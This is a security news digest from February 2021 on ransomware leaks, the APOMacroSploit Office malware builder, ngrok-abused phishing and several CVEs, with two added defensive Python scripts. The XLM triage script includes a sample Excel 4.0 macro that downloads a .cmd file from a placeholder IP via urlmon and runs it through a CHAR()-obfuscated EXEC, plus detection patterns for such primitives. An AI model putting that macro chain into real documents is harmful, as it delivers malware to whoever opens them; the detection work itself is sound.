Cyware Daily Threat Intelligence, February 17, 2021


The hide-and-seek game between defenders and threat actors keeps getting harder as attackers refine their evasion techniques. A newly disclosed malware builder dubbed APOMacroSploit was used against more than 80 targets worldwide in an attempt to take remote control of victim machines and steal information.

A threat actor group that goes by the name ScamClub also emerged from the shadows after researchers published details of a massive malvertising campaign in which the attackers exploited a zero-day vulnerability in WebKit to push fraudulent gift card scams. Meanwhile, data offered on dark web and hacking forums kept security teams busy: files tied to the law firm Jones Day were leaked by a ransomware gang, and a database of Amazon and eBay customer records was put up for sale.

Top Breaches Reported in the Last 24 Hours

Jones Day’s data leak
The gang behind the Clop ransomware has started leaking files allegedly stolen from the law firm Jones Day. The group runs a leak site on the Tor network where it publishes files from organizations that refuse to pay.

Customers’ account on sale
Data from 14 million Amazon and eBay customer accounts was put up for sale on a popular hacking forum. The records date back to 2014 and belong to users in 18 countries. The database was offered for $800 and includes customers' full names, postal codes, delivery addresses, and the names of the shops they bought from.

One more victim on the dark web
Data stolen from a North Carolina county's computer systems has also surfaced on the dark web, according to a new investigation. The county was hit by ransomware on October 28.

Top Malware Reported in the Last 24 Hours

APOMacroSploit malware builder
Security researchers have identified a new Office malware builder, APOMacroSploit, whose documents evade detection by Windows Defender. The infection begins when the recipient enables dynamic content in the attached XLS file: an XLM (Excel 4.0) macro then runs automatically and downloads a Windows command script to the machine.
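The chain described above (auto-running XLM macro, download of a command script, execution) leaves recognisable traces in the macro sheet's defined names and cell formulas. The script below is an added example, not code from Cyware or from the researchers who analysed APOMacroSploit: it scores formulas and defined names of the kind one would extract from an .xls with a tool such as oletools' olevba, and it also undoes the CHAR(n)&CHAR(m) string obfuscation XLM droppers commonly use to hide EXEC and URL strings. The sample formulas, names and URL are constructed for the demonstration.

```python
"""Heuristic triage of Excel 4.0 (XLM) macro sheets.

Added example: input is a dict of defined names and a dict of cell formulas,
as a macro extractor would produce them; nothing here parses the binary .xls.
"""
import re
from dataclasses import dataclass, field

# Defined names Excel runs automatically when the workbook opens/closes.
AUTO_EXEC_NAME = re.compile(r"^auto_(open|close|activate|deactivate)", re.I)
# XLM functions that execute code, call Win32 APIs or write new formulas.
DANGEROUS_FUNC = re.compile(
    r"\b(EXEC|CALL|REGISTER|FORMULA(?:\.FILL)?|RUN|FOPEN|FWRITE)\s*\(", re.I)
URL = re.compile(r"(?:https?|ftp)://[^\s\"'<>)]+", re.I)
SCRIPT_EXT = re.compile(r"\.(cmd|bat|vbs|js|ps1|hta|exe|dll)\b", re.I)
# A run of CHAR(n)&CHAR(m)&... builds a string character by character.
CHAR_RUN = re.compile(r"(?:CHAR\(\d+\)\s*&\s*)+CHAR\(\d+\)", re.I)


def xlm_char_obfuscate(text):
    """Build the CHAR(n)&CHAR(m)&... form droppers use to hide strings (for the sample)."""
    return "&".join(f"CHAR({ord(c)})" for c in text)


def decode_char_runs(formula):
    """Replace each CHAR() run with the quoted literal it evaluates to."""
    def repl(m):
        codes = re.findall(r"CHAR\((\d+)\)", m.group(0), re.I)
        return '"' + "".join(chr(int(c)) for c in codes) + '"'
    return CHAR_RUN.sub(repl, formula)


@dataclass
class XlmReport:
    auto_exec: list = field(default_factory=list)
    findings: list = field(default_factory=list)   # (cell, reason)
    score: int = 0

    @property
    def verdict(self):
        # Auto-run plus a download/execute primitive is the chain that matters.
        if self.auto_exec and self.score >= 4:
            return "malicious"
        return "suspicious" if self.score else "clean"


def analyze_xlm(defined_names, formulas):
    rep = XlmReport()
    for name, target in defined_names.items():
        if AUTO_EXEC_NAME.match(name):
            rep.auto_exec.append(f"{name} -> {target}")
            rep.score += 3
    for cell, raw in formulas.items():
        f = decode_char_runs(raw)
        if f != raw:
            rep.findings.append((cell, "CHAR()-obfuscated string"))
            rep.score += 1
        for m in DANGEROUS_FUNC.finditer(f):
            rep.findings.append((cell, f"calls {m.group(1).upper()}"))
            rep.score += 2
        for url in URL.findall(f):
            rep.findings.append((cell, f"URL {url}"))
            rep.score += 2
        for ext in sorted({e.lower() for e in SCRIPT_EXT.findall(f)}):
            rep.findings.append((cell, f"references .{ext} file"))
            rep.score += 1
    return rep


# Constructed sample mirroring the described chain: Auto_Open -> CALL urlmon to
# fetch a .cmd script -> EXEC it (the EXEC line hidden behind CHAR() calls).
# 198.51.100.7 is a documentation address, not a real dropper host.
SAMPLE_NAMES = {"Auto_Open": "Macro1!$A$1", "_xlnm.Print_Area": "Sheet1!$A$1:$D$4"}
SAMPLE_FORMULAS = {
    "Macro1!A1": '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
                 '"http://198.51.100.7/load.cmd","C:\\Users\\Public\\load.cmd",0,0)',
    "Macro1!A2": "=FORMULA(" + xlm_char_obfuscate('=EXEC("cmd /c C:\\Users\\Public\\load.cmd")') + ",A3)",
    "Macro1!A3": "=HALT()",
}
BENIGN_FORMULAS = {"Sheet1!B2": "=SUM(A1:A10)", "Sheet1!B3": '=IF(B2>100,"high","low")'}

if __name__ == "__main__":
    rep = analyze_xlm(SAMPLE_NAMES, SAMPLE_FORMULAS)
    print(rep.verdict, rep.score)
    for item in rep.auto_exec:
        print("  auto-exec:", item)
    for cell, reason in rep.findings:
        print(f"  {cell}: {reason}")
    print(analyze_xlm({}, BENIGN_FORMULAS).verdict)
```

The thresholds are arbitrary starting points; what should drive the verdict in practice is the combination of an auto-exec name with a download or EXEC primitive, since legitimate XLM sheets rarely have both. Hidden or "very hidden" macro sheets are a further indicator the extractor can report but this scoring does not see.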

Phishing attacks
Threat actors have been found abusing the Ngrok tunnelling service in a new wave of phishing attacks, using it to expose phishing pages and malware infrastructure without owning any servers. Malware samples seen in the campaign include njRAT, DarkComet, Quasar, AsyncRAT, and NanoCore.
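Because ngrok hands out hostnames under a small set of public suffixes, tunnels abused for phishing or RAT command-and-control are easy to spot in DNS and proxy logs. The script below is an added example, not code from Cyware or the cited research: it classifies hostnames as ngrok tunnel endpoints or as the agent's control-plane connection and raises one alert per source host and endpoint. The suffix and control-plane lists are an assumption drawn from ngrok's public naming and should be checked against ngrok's current documentation before use; the log lines are constructed and use documentation addresses.

```python
"""Flag ngrok tunnel endpoints in normalised DNS/proxy logs (added example)."""
import re
from collections import defaultdict

# Assumed public tunnel suffixes (a phishing page or RAT C2 exposed through
# ngrok gets one of these) and the control-plane hosts the ngrok agent dials.
TUNNEL_SUFFIXES = (".ngrok.io", ".ngrok.app", ".ngrok-free.app", ".ngrok.dev")
AGENT_HOSTS = ("tunnel.ngrok.com", "connect.ngrok-agent.com")
# Classic free-tier tunnels: 12 hex chars, optional region label, .ngrok.io
RANDOM_TUNNEL = re.compile(r"^[0-9a-f]{12}(?:\.[a-z]{2})?\.ngrok\.io$")
HOST_RE = re.compile(r"(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


def classify_host(host):
    """Return 'ngrok-agent', 'ngrok-tunnel-random', 'ngrok-tunnel' or None."""
    h = host.lower().rstrip(".")
    if h in AGENT_HOSTS or h.endswith(".ngrok-agent.com"):
        return "ngrok-agent"
    if h.endswith(TUNNEL_SUFFIXES):
        return "ngrok-tunnel-random" if RANDOM_TUNNEL.match(h) else "ngrok-tunnel"
    return None   # ngrok.com itself, and everything else, is not flagged


def hosts_in(text):
    """Every dotted hostname-like token in a log fragment (IPs included, harmlessly)."""
    return [m.group(1) for m in HOST_RE.finditer(text)]


def scan(lines):
    """Return (alerts, per-source summary); one alert per new (src, host) pair."""
    alerts = []
    per_src = defaultdict(set)
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split()
        ts, src, detail = fields[0], fields[1], " ".join(fields[2:])
        for host in hosts_in(detail):
            kind = classify_host(host)
            if kind and host.lower() not in per_src[src]:
                per_src[src].add(host.lower())
                alerts.append({"ts": ts, "src": src, "host": host.lower(), "kind": kind})
    return alerts, {s: sorted(h) for s, h in per_src.items() if h}


# Constructed log, normalised to "ts src type detail" from DNS and proxy sources.
# 10.0.5.21 visits a fake OWA login served through a tunnel; 10.0.7.88 is running
# the ngrok agent itself (outbound control-plane connection).
SAMPLE_LOG = """\
# ts src type detail
2021-02-17T08:14:02 10.0.5.21 dns login.microsoftonline.com
2021-02-17T08:14:05 10.0.5.21 http GET https://3f2a9c1d8b7e.ngrok.io/owa/auth/logon.aspx 200
2021-02-17T08:14:09 10.0.5.21 dns 3f2a9c1d8b7e.ngrok.io
2021-02-17T08:20:41 10.0.7.88 dns tunnel.ngrok.com
2021-02-17T08:20:42 10.0.7.88 tcp 10.0.7.88:51544 -> 203.0.113.9:443
2021-02-17T09:01:13 10.0.9.14 http GET https://docs.python.org/3/library/re.html 200
2021-02-17T09:05:00 10.0.5.21 http POST https://3f2a9c1d8b7e.ngrok.io/owa/auth.php 302
"""

if __name__ == "__main__":
    alerts, summary = scan(SAMPLE_LOG.splitlines())
    for a in alerts:
        print(f"{a['ts']} {a['src']} -> {a['host']} [{a['kind']}]")
    print(summary)
```

An internal host that resolves the agent control plane but never touches a tunnel hostname is the more interesting of the two findings: it is the machine running the ngrok client, which in a phishing or RAT scenario is the one exposing something from inside the network.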

Top Vulnerabilities Reported in the Last 24 Hours

Critical SDK flaw
A flaw in the video calling SDK provided by Agora could have allowed attackers to snoop on users' audio and video calls. The bug, tracked as CVE-2020-25605, affected apps including MeetMe, Skout, Nimo TV, temi, Dr. First Backline, Hike, Bunch, and Talkspace.

WebKit zero-day exploited
A malvertising group named ScamClub exploited a zero-day vulnerability in the WebKit browser engine to push payloads that redirected victims to gift card scams. The group ran the campaign covertly for three months, using the bug to escape the iframe sandboxing policy that is supposed to stop an ad from navigating the page that embeds it.

OpenSSL patches three flaws
OpenSSL has released patches for three vulnerabilities, two of which can be exploited to crash applications using the library (a denial of service, not a distributed attack). The flaws are CVE-2021-23841, CVE-2021-23839, and CVE-2021-23840.

SQLite issues a patch
SQLite has issued a security patch for a use-after-free vulnerability that could lead to arbitrary code execution or denial of service. The flaw is rated medium severity.

Top Scams Reported in the Last 24 Hours

NHS phishing scam
Security experts are warning of a new COVID-19 vaccine phishing scam that tricks recipients into handing over personal and financial information. The messages tell recipients they have been selected for a jab (vaccination) based on their family and medical history. They impersonate the trusted NHS brand and promise protection from the virus in exchange for the victim's details.

Tags

webkit
clop ransomware
sqlite
apomacrosploit malware
sdk flaw
openssl

Posted on: February 17, 2021
